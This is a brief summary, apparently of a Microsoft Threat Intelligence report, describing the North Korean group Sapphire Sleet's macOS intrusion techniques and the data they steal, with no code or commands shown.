Dissecting Sapphire Sleet’s macOS intrusion from lure to compromise

Microsoft Threat Intelligence documents a macOS-focused intrusion campaign by the North Korean APT Sapphire Sleet that abuses social engineering (malicious compiled AppleScript lures) and cascading curl→osascript chains to deploy multiple backdoors and a credential harvester; the actor bypasses macOS protections (TCC, Gatekeeper), establishes persistence via launch daemons, performs reflective in-memory loading, and exfiltrates wallets, keychains, browser data, Telegram sessions and other sensitive artifacts, with detailed IOCs, hunting queries, and mitigation guidance provided.